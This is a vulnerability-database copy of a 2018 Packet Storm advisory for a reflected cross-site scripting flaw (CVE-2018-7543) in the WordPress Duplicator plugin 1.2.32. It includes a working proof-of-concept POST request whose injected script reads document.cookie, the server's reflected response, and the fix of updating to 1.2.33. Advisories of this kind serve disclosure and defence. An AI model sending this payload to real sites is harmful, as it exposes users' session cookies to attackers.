Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormStefan BroederPACKETSTORM:146816
HistoryMar 15, 2018 - 12:00 a.m.

WordPress Duplicator 1.2.32 Cross Site Scripting

2018-03-1500:00:00
Stefan Broeder
packetstormsecurity.com
25

EPSS

0.002

Percentile

60.7%

JSON
`# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS)  
# Date: 25-02-2018   
# Exploit Author : Stefan Broeder  
# Contact : https://twitter.com/stefanbroeder  
# Vendor Homepage: https://snapcreek.com/  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Version: 1.2.32  
# CVE : CVE-2018-7543  
# Category : webapps  
  
Description  
===========  
Duplicator is a wordpress plugin with more than 1 million of active installations. Version 1.2.32 (and possibly previous versionss) are affected by a Reflected XSS vulnerability.  
  
Vulnerable part of code  
=======================  
File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'.  
  
Impact  
======  
Arbitrary JavaScript code can be run on browser side if a user is tricked to click over a link or browse a URL under the attacker control.  
  
Proof of Concept  
============  
In order to exploit this vulnerability, an attacker has to send the following request to the server:  
  
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1  
Host: <hostname>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>  
Connection: close  
Upgrade-Insecure-Requests: 1  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 91  
  
json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''  
  
The server replies as reported below:  
  
HTTP/1.1 200 OK  
Date: Mon, 12 Feb 2018 14:15:28 GMT  
Server: Apache/2.4.29 (Debian)  
Vary: Accept-Encoding  
Content-Length: 10224  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
...  
  
<script>  
MyViewModel = function() {  
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';  
var errorCount = this.status.step2.query_errs || 0;  
(errorCount >= 1 )  
? $('#dup-step3-install-report-count').css('color', '#BE2323')  
: $('#dup-step3-install-report-count').css('color', '#197713')  
};  
ko.applyBindings(new MyViewModel());   
</script>  
  
Solution  
========  
  
Update to version 1.2.33  
  
`

Related

wpvulndb 1
cvelist 1
exploitdb 1
prion 1
zdt 1
exploitpack 1
patchstack 1
cve 1
nvd 1
wpvulndb
wpvulndb
Duplicator <= 1.2.32 - Cross-Site Scripting (XSS)
2018-03-15 00:00:00
cvelist
cvelist
CVE-2018-7543
2018-03-26 18:00:00
exploitdb
exploitdb
WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting
2018-03-15 00:00:00
prion
prion
Cross site scripting
2018-03-26 18:29:00
zdt
zdt
WordPress Duplicator 1.2.32 Plugin - Cross-Site Scripting Vulnerability
2018-03-16 00:00:00
exploitpack
exploitpack
WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting
2018-03-15 00:00:00
patchstack
patchstack
WordPress Duplicator plugin <=1.2.32 - Cross-Site Scripting (XSS) vulnerability
2018-03-28 00:00:00
cve
cve
CVE-2018-7543
2018-03-26 18:29:01
nvd
nvd
CVE-2018-7543
2018-03-26 18:29:01

EPSS

0.002

Percentile

60.7%

JSON
Related for PACKETSTORM:146816
wpvulndb1cvelist1exploitdb1prion1zdt1exploitpack1patchstack1cve1nvd1